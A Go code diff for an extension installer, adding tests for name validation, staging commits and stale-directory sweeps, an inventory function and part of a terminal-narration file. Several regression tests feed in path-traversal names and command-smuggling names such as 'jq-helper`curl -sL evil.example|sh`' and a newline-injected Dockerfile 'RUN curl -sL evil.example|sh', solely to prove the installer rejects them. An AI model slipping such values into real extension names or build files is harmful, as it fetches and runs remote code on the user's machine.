+			t.Fatalf("Add installed a colliding name: %s", fmtResults(results))
+		}
+		if !strings.Contains(err.Error(), "a/foo") || !strings.Contains(err.Error(), "b/foo") {
+			t.Fatalf("error does not name both directories: %v", err)
+		}
+	}
+
+	t.Run("no selector", func(t *testing.T) { assertCollision(t, addRequest()) })
+	t.Run("all", func(t *testing.T) {
+		req := addRequest()
+		req.All = true
+		assertCollision(t, req)
+	})
+	t.Run("name", func(t *testing.T) { assertCollision(t, addRequest("foo")) })
+
+	entries, err := os.ReadDir(env.Paths.UserFeaturesDir)
+	if err != nil {
+		t.Fatalf("ReadDir: %v", err)
+	}
+	if len(entries) != 0 {
+		t.Fatalf("collision installed something: %v", entries)
+	}
+}
+
+func TestRemoveInstalledDeletesManagedDirectory(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Add(context.Background(), env, addRequest()); err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	if _, err := os.Stat(installed); err != nil {
+		t.Fatalf("precondition: %v", err)
+	}
+
+	if err := removeInstalled(env, model.KindFeature, "foo"); err != nil {
+		t.Fatalf("removeInstalled: %v", err)
+	}
+	if _, err := os.Stat(installed); !os.IsNotExist(err) {
+		t.Fatalf("removeInstalled left the directory behind: %v", err)
+	}
+}
+
+// TestValidExtensionNameRejectsUnsafeNames pins validExtensionName's exact
+// behavior directly (as opposed to only through Add, which cannot reach every
+// case: a real git tree can never hand classify a directory-derived name
+// containing "/" or "\", so the end-to-end path below only exercises the
+// root-level, spec-declared-name route). This is the single guard standing
+// between an untrusted repository's spec.yaml and a write outside the staging
+// root; see TestAddRejectsTraversalNameEndToEnd for proof that removing it is
+// exploitable, not just theoretically wrong.
+func TestValidExtensionNameRejectsUnsafeNames(t *testing.T) {
+	rejected := []string{
+		"..", "../../../etc/evil", ".", "", "a/b", "a\\b", "/etc/passwd", "..\\evil", ".evil", ".hidden-name",
+		// Shell and Dockerfile metacharacters: the name is interpolated into
+		// generated Dockerfile instructions, so a name that is a usable
+		// filename can still be unusable as an identity. See
+		// TestAddRejectsMetacharacterNameEndToEnd.
+		"jq-helper$(id)", "jq-helper`id`", "jq helper", "jq-helper\nRUN id",
+	}
+	for _, name := range rejected {
+		if err := validExtensionName(name); err == nil {
+			t.Errorf("validExtensionName(%q) = nil, want an error", name)
+		}
+	}
+
+	accepted := []string{"foo", "foo-bar", "foo_bar", "foo.bar", "claude-code"}
+	for _, name := range accepted {
+		if err := validExtensionName(name); err != nil {
+			t.Errorf("validExtensionName(%q) = %v, want nil", name, err)
+		}
+	}
+}
+
+// snapshotTree records every path under root and its mode, so a test can
+// assert that an operation touched nothing beyond a specific, expected set of
+// paths — including paths a path-traversal bug might create outside any
+// directory the test otherwise inspects.
+func snapshotTree(t *testing.T, root string) map[string]fs.FileMode {
+	t.Helper()
+	snap := map[string]fs.FileMode{}
+	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, walkErr error) error {
+		if walkErr != nil {
+			return walkErr
+		}
+		rel, relErr := filepath.Rel(root, path)
+		if relErr != nil {
+			return relErr
+		}
+		info, infoErr := d.Info()
+		if infoErr != nil {
+			return infoErr
+		}
+		snap[rel] = info.Mode()
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("snapshotTree(%s): %v", root, err)
+	}
+	return snap
+}
+
+// TestAddRejectsTraversalNameEndToEnd is the regression test for the
+// path-traversal guard in validExtensionName. A repository-root spec.yaml
+// (the only discovery path where the installed name comes straight from the
+// untrusted spec document rather than a git-tree directory name) declaring a
+// traversal or bare ".." name must be rejected by Add, and must leave every
+// byte on disk exactly as it was: not just the destination directory, but
+// everything under the test's temp root, since a successful traversal would
+// land somewhere else under there.
+func TestAddRejectsTraversalNameEndToEnd(t *testing.T) {
+	rootSpec := func(name string) map[string]string {
+		return map[string]string{
+			"spec.yaml":  "schemaVersion: \"1\"\nkind: mixin\nname: " + name + "\n",
+			"install.sh": "#!/bin/sh\necho evil\n",
+		}
+	}
+
+	cases := []string{"..", "../../../etc/evil"}
+	for _, name := range cases {
+		t.Run(name, func(t *testing.T) {
+			fetcher := newFakeFetcher(t, "a1b2c3d4", rootSpec(name))
+			env, _ := testEnv(t, fetcher, "")
+			root := filepath.Dir(env.Home)
+
+			// --force: without it, planFor's "already installed" check rejects
+			// the ".." case first (kindDir/".." always exists) and masks the
+			// guard under test.
+			req := addRequest()
+			req.Force = true
+			before := snapshotTree(t, root)
+			results, err := Add(context.Background(), env, req)
+			if err == nil && !HasFailure(results) {
+				t.Fatalf("Add accepted traversal name %q: %s", name, fmtResults(results))
+			}
+
+			entries, readErr := os.ReadDir(env.Paths.UserFeaturesDir)
+			if readErr != nil {
+				t.Fatalf("ReadDir: %v", readErr)
+			}
+			if len(entries) != 0 {
+				t.Fatalf("destination is not untouched: %v", entries)
+			}
+
+			after := snapshotTree(t, root)
+			if len(before) != len(after) {
+				t.Fatalf("traversal wrote outside the destination:\nbefore=%v\nafter=%v", before, after)
+			}
+			for path, mode := range before {
+				if after[path] != mode {
+					t.Fatalf("path %q changed (before=%v after=%v)", path, mode, after[path])
+				}
+			}
+		})
+	}
+}
+
+// TestAddRejectsMetacharacterNameEndToEnd covers the other half of what an
+// untrusted spec-declared name can reach. A name needs no path separator to be
+// dangerous: it becomes a directory under the user extension root, is copied
+// into the docker build context, and is interpolated into generated Dockerfile
+// instructions, where a shell-form RUN reaches it through /bin/sh -c and a
+// newline starts a fresh instruction. A name carrying "$(...)", a backtick, or
+// a newline therefore buys build-time code execution that no row of the
+// capability summary describes — an extension declaring nothing but an apt
+// package would run it — so Add must refuse the name outright.
+func TestAddRejectsMetacharacterNameEndToEnd(t *testing.T) {
+	names := []string{
+		"jq-helper$(touch pwned)",
+		"jq-helper`curl -sL evil.example|sh`",
+		"jq-helper\nRUN curl -sL evil.example|sh #",
+	}
+	for _, name := range names {
+		t.Run(name, func(t *testing.T) {
+			spec := "schemaVersion: \"1\"\nkind: mixin\nname: " + strconv.Quote(name) + "\naptPackages: [jq]\n"
+			fetcher := newFakeFetcher(t, "a1b2c3d4", map[string]string{"spec.yaml": spec})
+			env, out := testEnv(t, fetcher, "")
+			root := filepath.Dir(env.Home)
+
+			before := snapshotTree(t, root)
+			results, err := Add(context.Background(), env, addRequest())
+			if err == nil && !HasFailure(results) {
+				t.Fatalf("Add accepted metacharacter name %q: %s", name, fmtResults(results))
+			}
+			if strings.Contains(out.String(), "installed") {
+				t.Fatalf("Add reported an install:\n%s", out.String())
+			}
+
+			after := snapshotTree(t, root)
+			if len(before) != len(after) {
+				t.Fatalf("Add wrote to disk:\nbefore=%v\nafter=%v", before, after)
+			}
+			for path, mode := range before {
+				if after[path] != mode {
+					t.Fatalf("path %q changed (before=%v after=%v)", path, mode, after[path])
+				}
+			}
+		})
+	}
+}
+
+// TestAddRejectsDotPrefixedNameEndToEnd: every extension-root scan
+// (config.ListExtensionDirNames, the loops behind config.ValidateExtensions)
+// skips dot-prefixed directories, on the assumption
+// that only this installer's own ".incoming-*"/".replaced-*" staging
+// directories ever look like that. An extension installed under a
+// dot-prefixed name — only possible from a repository-root spec, same as the
+// traversal case above — would therefore be mountable while never being
+// listed or validated again, so the name is rejected before anything is
+// staged. The fixture is invalid for an unrelated reason (an out-of-range
+// port, same spec as TestAddValidationFailureWritesNothing) so the sound-name
+// case still fails at staged validation.
+func TestAddRejectsDotPrefixedNameEndToEnd(t *testing.T) {
+	filesFor := func(name string) map[string]string {
+		return map[string]string{
+			"spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: " + name + "\nports:\n  - container: 99999\n",
+		}
+	}
+
+	t.Run("rejected before staging", func(t *testing.T) {
+		fetcher := newFakeFetcher(t, "a1b2c3d4", filesFor(".evil"))
+		env, _ := testEnv(t, fetcher, "")
+
+		results, err := Add(context.Background(), env, addRequest())
+		if err == nil && !HasFailure(results) {
+			t.Fatalf("Add accepted a dot-prefixed name: %s", fmtResults(results))
+		}
+
+		entries, readErr := os.ReadDir(env.Paths.UserFeaturesDir)
+		if readErr != nil {
+			t.Fatalf("ReadDir: %v", readErr)
+		}
+		if len(entries) != 0 {
+			t.Fatalf("a dot-prefixed name left something behind: %v", entries)
+		}
+	})
+
+	// Same invalid content under a normal name is the control: it must also
+	// fail, just later (in staged validation, not name-checking), proving the
+	// content itself is genuinely invalid and not merely a name-check false
+	// positive.
+	t.Run("normal name also invalid", func(t *testing.T) {
+		fetcher := newFakeFetcher(t, "a1b2c3d4", filesFor("badnormal"))
+		env, _ := testEnv(t, fetcher, "")
+
+		results, err := Add(context.Background(), env, addRequest())
+		if err == nil && !HasFailure(results) {
+			t.Fatalf("Add accepted an out-of-range port: %s", fmtResults(results))
+		}
+	})
+}
+
+// TestStagingCommitInvokesStampAfterSwap pins the ordering commit's doc
+// comment promises: stamp only runs once the swap is visible at
+// installedPath, and while the lock commit acquired is still held — the
+// metadata write must be part of the same critical section as the swap, not a
+// separate step that runs after the lock is released.
+func TestStagingCommitInvokesStampAfterSwap(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+	writeFixture(t, filepath.Join(stage.extDir("foo"), "spec.yaml"), fooFeatureSpec, 0o644)
+
+	var sawContentAtStamp bool
+	installedPath, err := stage.commit(env, "foo", func(installedPath string) error {
+		_, statErr := os.Stat(filepath.Join(installedPath, "spec.yaml"))
+		sawContentAtStamp = statErr == nil
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("commit: %v", err)
+	}
+	if !sawContentAtStamp {
+		t.Fatal("stamp ran before the swap was visible at installedPath")
+	}
+	if _, err := os.Stat(filepath.Join(installedPath, "spec.yaml")); err != nil {
+		t.Fatalf("commit did not leave the swapped content in place: %v", err)
+	}
+}
+
+// TestStagingCommitStampFailureRestoresPreviousState covers the unwind path:
+// a stamp error must leave the destination exactly as it was before commit was
+// called, the same guarantee a rename failure gives.
+func TestStagingCommitStampFailureRestoresPreviousState(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+	existing := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(existing, "marker.txt"), "old\n", 0o644)
+	writeFixture(t, filepath.Join(stage.extDir("foo"), "marker.txt"), "new\n", 0o644)
+
+	wantErr := errors.New("stamp boom")
+	_, err = stage.commit(env, "foo", func(string) error { return wantErr })
+	if !errors.Is(err, wantErr) {
+		t.Fatalf("commit error = %v, want %v", err, wantErr)
+	}
+
+	data, readErr := os.ReadFile(filepath.Join(existing, "marker.txt"))
+	if readErr != nil {
+		t.Fatalf("existing content was not restored: %v", readErr)
+	}
+	if string(data) != "old\n" {
+		t.Fatalf("existing content = %q, want %q", data, "old\n")
+	}
+
+	entries, err := os.ReadDir(env.Paths.UserFeaturesDir)
+	if err != nil {
+		t.Fatalf("ReadDir: %v", err)
+	}
+	for _, entry := range entries {
+		if strings.HasPrefix(entry.Name(), replacedPrefix) {
+			t.Fatalf("a %s leftover survived a restored stamp failure: %s", replacedPrefix, entry.Name())
+		}
+	}
+}
+
+// TestSweepStaleRespectsTouch: a staging directory whose mtime was refreshed
+// (as applyPlan does around the confirmation prompt and the swap) must survive
+// a sweep even though its original mtime was old enough to be swept.
+func TestSweepStaleRespectsTouch(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+	old := env.now().Add(-48 * time.Hour)
+	if err := os.Chtimes(stage.root, old, old); err != nil {
+		t.Fatalf("Chtimes: %v", err)
+	}
+
+	stage.touch(env)
+	sweepStale(stage.kindDir, env.now())
+
+	if _, statErr := os.Stat(stage.root); statErr != nil {
+		t.Fatalf("touch did not protect a live staging directory from being swept: %v", statErr)
+	}
+}
+
+// TestSweepStaleRemovesUntouchedOldDirectory is the complement of
+// TestSweepStaleRespectsTouch: a staging directory nobody has touched in over
+// staleAge is still swept.
+func TestSweepStaleRemovesUntouchedOldDirectory(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+	old := env.now().Add(-25 * time.Hour)
+	if err := os.Chtimes(stage.root, old, old); err != nil {
+		t.Fatalf("Chtimes: %v", err)
+	}
+
+	sweepStale(stage.kindDir, env.now())
+
+	if _, statErr := os.Stat(stage.root); !os.IsNotExist(statErr) {
+		t.Fatalf("a staging directory untouched for over staleAge was not swept: %v", statErr)
+	}
+}
+
+// TestStagingCommitReplacedNamesAreUniquePerSwap: the "moved aside" directory
+// name must vary per swap, not just per process. A leftover from an earlier
+// interrupted swap of the same name (a crash between commit's two renames)
+// would otherwise collide with a later swap from the same pid, and the rename
+// onto that stale, non-empty directory would fail.
+func TestStagingCommitReplacedNamesAreUniquePerSwap(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+
+	// Simulate a leftover from an interrupted swap that used the old,
+	// PID-only naming scheme (no separator, no per-swap component).
+	staleLeftover := filepath.Join(stage.kindDir, fmt.Sprintf("%sfoo%d", replacedPrefix, os.Getpid()))
+	writeFixture(t, filepath.Join(staleLeftover, "marker.txt"), "stale\n", 0o644)
+
+	existing := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(existing, "marker.txt"), "old\n", 0o644)
+	writeFixture(t, filepath.Join(stage.extDir("foo"), "marker.txt"), "new\n", 0o644)
+
+	if _, err := stage.commit(env, "foo", nil); err != nil {
+		t.Fatalf("commit collided with a stale leftover at the old naming scheme's path: %v", err)
+	}
+	if _, statErr := os.Stat(staleLeftover); statErr != nil {
+		t.Fatalf("commit touched an unrelated stale directory at the old naming scheme's path: %v", statErr)
+	}
+	data, err := os.ReadFile(filepath.Join(existing, "marker.txt"))
+	if err != nil || string(data) != "new\n" {
+		t.Fatalf("swap did not complete as expected: %q, %v", data, err)
+	}
+}

--- a/internal/extinstall/install_test.go
+++ b/internal/extinstall/install_test.go
@@ -458,6 +458,30 @@ func TestAddRejectsNameCollisionAcrossDirectories(t *testing.T) {
 	}
 }
 
+// TestAddNamedExtensionIgnoresUnrelatedCollision keeps the collision check
+// where it matters: a duplicate pair the user is not installing says nothing
+// about the extension they asked for by name.
+func TestAddNamedExtensionIgnoresUnrelatedCollision(t *testing.T) {
+	files := map[string]string{
+		"a/foo/spec.yaml": fooFeatureSpec,
+		"b/foo/spec.yaml": fooFeatureSpec,
+		"c/bar/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: bar\n",
+	}
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, _ := testEnv(t, fetcher, "")
+
+	results, err := Add(context.Background(), env, addRequest("bar"))
+	if err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "bar", "spec.yaml")); statErr != nil {
+		t.Fatalf("bar was not installed: %v", statErr)
+	}
+}
+
 func TestRemoveInstalledDeletesManagedDirectory(t *testing.T) {
 	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
 	env, _ := testEnv(t, fetcher, "")

--- a/internal/extinstall/inventory.go
+++ b/internal/extinstall/inventory.go
@@ -1,0 +1,91 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+
+	"enclave/internal/config"
+	"enclave/internal/model"
+)
+
+// Managed describes one discovered extension: where its files come from, and
+// its provenance when the installer put them there.
+type Managed struct {
+	Name   string
+	Source string
+	Origin *Origin
+	// Modified reports content edited by hand since the install. It is only
+	// filled in at InventoryModifications detail, since answering it costs a
+	// full read of the extension's content.
+	Modified bool
+	// Problem is a compact, single-line description of a provenance read
+	// failure for this extension (e.g. a corrupt sidecar). It never aborts
+	// Inventory: a listing command must list. When set, Origin is nil and
+	// Modified is false.
+	Problem string
+}
+
+// InventoryDetail selects how much Inventory reports about each extension;
+// every level costs more I/O than the one before it.
+type InventoryDetail int
+
+const (
+	// InventoryNames resolves each extension's built-in and user directories
+	// and classifies its Source. Nothing inside an extension is opened.
+	InventoryNames InventoryDetail = iota
+	// InventoryProvenance also reads each user extension's provenance sidecar
+	// into Origin: one small JSON document per extension, no content.
+	InventoryProvenance
+	// InventoryModifications also hashes each user extension's whole tree to
+	// report Modified.
+	InventoryModifications
+)
+
+// Inventory reports extensions of kind visible to paths, keyed by name. A nil
+// names enumerates every extension directory of that kind, including one whose
+// spec no longer loads, so a management command can still reach it; a caller
+// that has already resolved the names passes them to avoid a second
+// enumeration.
+//
+// Provenance is read from the user directory only: a built-in never carries a
+// sidecar.
+func Inventory(paths model.Paths, kind model.ExtensionKind, names []string, detail InventoryDetail) (map[string]Managed, error) {
+	if names == nil {
+		var err error
+		if names, err = config.ListExtensionDirNames(paths, kind); err != nil {
+			return nil, err
+		}
+	}
+
+	inventory := make(map[string]Managed, len(names))
+	for _, name := range names {
+		builtinDir, userDir := config.ResolveExtensionDirs(paths, kind, name)
+		entry := Managed{Name: name, Source: config.SourceLabel(builtinDir, userDir)}
+		if detail > InventoryNames && userDir != "" {
+			origin, readErr := readOrigin(userDir)
+			switch {
+			case readErr != nil:
+				entry.Problem = fmt.Sprintf("%s %q: %v", kind.Label(), name, readErr)
+			case origin != nil:
+				entry.Origin = origin
+				if detail >= InventoryModifications {
+					modified, modErr := isLocallyModified(userDir, *origin)
+					if modErr != nil {
+						entry.Origin = nil
+						entry.Problem = fmt.Sprintf("%s %q: %v", kind.Label(), name, modErr)
+						break
+					}
+					entry.Modified = modified
+				}
+			}
+		}
+		inventory[name] = entry
+	}
+	return inventory, nil
+}

--- a/internal/extinstall/inventory_test.go
+++ b/internal/extinstall/inventory_test.go
@@ -1,0 +1,224 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+func inventoryPaths(t *testing.T) model.Paths {
+	t.Helper()
+	root := t.TempDir()
+	return model.Paths{
+		ToolsDir:        filepath.Join(root, "extensions", "tools"),
+		FeaturesDir:     filepath.Join(root, "extensions", "features"),
+		UserToolsDir:    filepath.Join(root, "user", "tools"),
+		UserFeaturesDir: filepath.Join(root, "user", "features"),
+	}
+}
+
+func TestInventoryClassifiesSources(t *testing.T) {
+	paths := inventoryPaths(t)
+	writeFixture(t, filepath.Join(paths.FeaturesDir, "builtin-only", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: builtin-only\n", 0o644)
+	writeFixture(t, filepath.Join(paths.FeaturesDir, "shadowed", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: shadowed\n", 0o644)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "shadowed", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: shadowed\n", 0o644)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "user-only", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: user-only\n", 0o644)
+
+	inventory, err := Inventory(paths, model.KindFeature, nil, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory: %v", err)
+	}
+	if inventory["builtin-only"].Source != "builtin" {
+		t.Errorf("builtin-only source = %q", inventory["builtin-only"].Source)
+	}
+	if inventory["shadowed"].Source != "override" {
+		t.Errorf("shadowed source = %q", inventory["shadowed"].Source)
+	}
+	if inventory["user-only"].Source != "user" {
+		t.Errorf("user-only source = %q", inventory["user-only"].Source)
+	}
+	for name, entry := range inventory {
+		if entry.Origin != nil {
+			t.Errorf("%s has provenance without a sidecar", name)
+		}
+	}
+}
+
+func TestInventoryReportsProvenanceAndModification(t *testing.T) {
+	paths := inventoryPaths(t)
+	extDir := filepath.Join(paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(extDir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	hash, err := TreeHash(extDir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	origin := Origin{
+		SchemaVersion: OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          "foo",
+		Remote:        "https://github.com/acme/kits",
+		Source:        "acme/kits",
+		Ref:           "main",
+		RefType:       RefTypeBranch,
+		Commit:        "a1b2c3d4e5f6a7b8",
+		TreeHash:      hash,
+	}
+	if err := WriteOrigin(extDir, origin); err != nil {
+		t.Fatalf("WriteOrigin: %v", err)
+	}
+
+	inventory, err := Inventory(paths, model.KindFeature, nil, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory: %v", err)
+	}
+	entry := inventory["foo"]
+	if entry.Origin == nil {
+		t.Fatal("expected provenance for a managed extension")
+	}
+	if entry.Modified {
+		t.Error("clean managed extension reported as modified")
+	}
+
+	writeFixture(t, filepath.Join(extDir, "extra.sh"), "echo hi\n", 0o644)
+	inventory, err = Inventory(paths, model.KindFeature, nil, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory: %v", err)
+	}
+	entry = inventory["foo"]
+	if !entry.Modified {
+		t.Fatal("edited managed extension reported as clean")
+	}
+}
+
+func TestInventoryToleratesCorruptSidecar(t *testing.T) {
+	paths := inventoryPaths(t)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "broken", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: broken\n", 0o644)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "broken", model.ExtensionSourceFilename), "{not valid json", 0o644)
+	writeFixture(t, filepath.Join(paths.FeaturesDir, "healthy", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: healthy\n", 0o644)
+
+	inventory, err := Inventory(paths, model.KindFeature, nil, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory: %v (a corrupt sidecar must not abort the listing)", err)
+	}
+	if len(inventory) != 2 {
+		t.Fatalf("expected both extensions to be listed, got %+v", inventory)
+	}
+
+	broken := inventory["broken"]
+	if broken.Problem == "" {
+		t.Fatal("expected Problem to be set for a corrupt sidecar")
+	}
+	if !strings.Contains(broken.Problem, "broken") {
+		t.Errorf("Problem = %q, want it to name the extension", broken.Problem)
+	}
+	if broken.Origin != nil {
+		t.Errorf("Origin = %+v, want nil when provenance could not be read", broken.Origin)
+	}
+	if broken.Modified {
+		t.Error("Modified = true, want false when provenance could not be read")
+	}
+
+	healthy, ok := inventory["healthy"]
+	if !ok || healthy.Problem != "" {
+		t.Errorf("healthy extension should be listed cleanly, got %+v", healthy)
+	}
+}
+
+// TestInventoryDetailStopsAtRequestedLevel pins what each detail level is
+// allowed to touch, which is the entire point of the parameter: shell
+// completion runs Inventory on every keystroke and must not pay for reading
+// provenance, let alone for hashing every installed byte.
+//
+// The proof is a dangling symlink inside the extension. Reading its content
+// fails with ENOENT for every user (root included), while the directory
+// entries and the sidecar next to it stay perfectly readable — so a level that
+// reports no problem here demonstrably never opened the content, and a level
+// that does report one demonstrably did.
+func TestInventoryDetailStopsAtRequestedLevel(t *testing.T) {
+	paths := inventoryPaths(t)
+	extDir := filepath.Join(paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(extDir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	hash, err := TreeHash(extDir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if err := WriteOrigin(extDir, Origin{
+		SchemaVersion: OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          "foo",
+		Remote:        "https://github.com/acme/kits",
+		Source:        "acme/kits",
+		Ref:           "main",
+		RefType:       RefTypeBranch,
+		Commit:        "a1b2c3d4e5f6a7b8",
+		TreeHash:      hash,
+	}); err != nil {
+		t.Fatalf("WriteOrigin: %v", err)
+	}
+	if err := os.Symlink(filepath.Join(extDir, "gone"), filepath.Join(extDir, "dangling")); err != nil {
+		t.Fatalf("Symlink: %v", err)
+	}
+
+	names, err := Inventory(paths, model.KindFeature, nil, InventoryNames)
+	if err != nil {
+		t.Fatalf("Inventory(InventoryNames): %v", err)
+	}
+	switch entry := names["foo"]; {
+	case entry.Source != "user":
+		t.Errorf("Source = %q, want the label to be classified at every level", entry.Source)
+	case entry.Origin != nil:
+		t.Error("InventoryNames read the provenance sidecar")
+	case entry.Problem != "":
+		t.Errorf("InventoryNames read the extension's content: %s", entry.Problem)
+	}
+
+	provenance, err := Inventory(paths, model.KindFeature, nil, InventoryProvenance)
+	if err != nil {
+		t.Fatalf("Inventory(InventoryProvenance): %v", err)
+	}
+	entry := provenance["foo"]
+	if entry.Origin == nil {
+		t.Fatal("InventoryProvenance did not read the provenance sidecar")
+	}
+	if entry.Problem != "" {
+		t.Errorf("InventoryProvenance read the extension's content: %s", entry.Problem)
+	}
+	if entry.Modified {
+		t.Error("Modified is only answered at InventoryModifications")
+	}
+
+	modifications, err := Inventory(paths, model.KindFeature, nil, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory(InventoryModifications): %v", err)
+	}
+	if modifications["foo"].Problem == "" {
+		t.Error("InventoryModifications did not read the extension's content")
+	}
+}
+
+// TestInventoryReportsOnlyTheRequestedNames covers the listing path, which has
+// already enumerated the extension roots itself and passes the result in
+// rather than paying for a second enumeration.
+func TestInventoryReportsOnlyTheRequestedNames(t *testing.T) {
+	paths := inventoryPaths(t)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "foo", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	writeFixture(t, filepath.Join(paths.UserFeaturesDir, "bar", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: bar\n", 0o644)
+
+	inventory, err := Inventory(paths, model.KindFeature, []string{"foo"}, InventoryModifications)
+	if err != nil {
+		t.Fatalf("Inventory: %v", err)
+	}
+	if len(inventory) != 1 || inventory["foo"].Source != "user" {
+		t.Fatalf("inventory = %+v, want only the requested name", inventory)
+	}
+}

--- a/internal/extinstall/narrate.go
+++ b/internal/extinstall/narrate.go
@@ -1,0 +1,235 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"unicode/utf8"
+
+	"golang.org/x/term"
+
+	"enclave/internal/logx"
+)
+
+// A run touches several extensions, so every block this package prints opens
+// with a rule carrying the extension's name. Without that separator the blocks
+// of a multi-extension run read as one wall of text.
+const (
+	ruleGlyph  = "━"
+	ruleLeadIn = 2 // rule cells before the name
+	ruleTailIn = 2 // rule cells after the right-hand caption
+	minRuleGap = 2 // rule cells between the name and the caption
+
+	defaultWidth = 80
+	// maxWidth keeps a rule from spanning a very wide terminal, where a
+	// full-width line is harder to read than a short one.
+	maxWidth = 96
+	minWidth = 40
+
+	bodyIndent = "  "
+	// labelGap separates the label column from the value column.
+	labelGap = 2
+)
+
+// Style is how narration is decorated. The zero value is plain text at a
+// default width, which is what a pipe and a test buffer want.
+type Style struct {
+	Color bool
+	Width int
+}
+
+// TerminalStyle resolves the style for a stream: color when the stream is a
+// terminal that wants it, wrapped to that terminal's width.
+func TerminalStyle(f *os.File) Style {
+	style := Style{Color: logx.ColorEnabledFor(f)}
+	if f == nil {
+		return style
+	}
+	if cols, _, err := term.GetSize(int(f.Fd())); err == nil { // #nosec G115 -- file descriptor from Fd() fits in int on all supported platforms.
+		style.Width = cols
+	}
+	return style
+}
+
+func (s Style) width() int {
+	if s.Width <= 0 {
+		return defaultWidth
+	}
+	return min(max(s.Width, minWidth), maxWidth)
+}
+
+func (s Style) paint(text string, color logx.Color) string {
+	if !s.Color || color == "" || text == "" {
+		return text
+	}
+	return string(color) + text + string(logx.ColorReset)
+}
+
+// section opens a block for one extension: a rule carrying the name on the
+// left and a caption such as `tool @ 8f0bbc7` on the right. When the two do not
+// fit on one line the caption moves below the rule rather than being truncated.
+func (e Env) section(style Style, name string, caption string) {
+	w := e.narrate()
+	width := style.width()
+	nameCells := ruleLeadIn + 1 + displayWidth(name) + 1 // "━━ name "
+	painted := style.paint(name, logx.ColorBold)
+
+	if caption == "" {
+		fill := width - nameCells
+		_, _ = fmt.Fprintf(w, "\n%s %s %s\n\n",
+			style.paint(strings.Repeat(ruleGlyph, ruleLeadIn), logx.ColorDim),
+			painted,
+			style.paint(strings.Repeat(ruleGlyph, max(fill, minRuleGap)), logx.ColorDim))
+		return
+	}
+
+	captionCells := 1 + displayWidth(caption) + 1 + ruleTailIn // " caption ━━"
+	fill := width - nameCells - captionCells
+	if fill < minRuleGap {
+		_, _ = fmt.Fprintf(w, "\n%s %s %s\n%s%s\n\n",
+			style.paint(strings.Repeat(ruleGlyph, ruleLeadIn), logx.ColorDim),
+			painted,
+			style.paint(strings.Repeat(ruleGlyph, minRuleGap), logx.ColorDim),
+			bodyIndent,
+			style.paint(caption, logx.ColorDim))
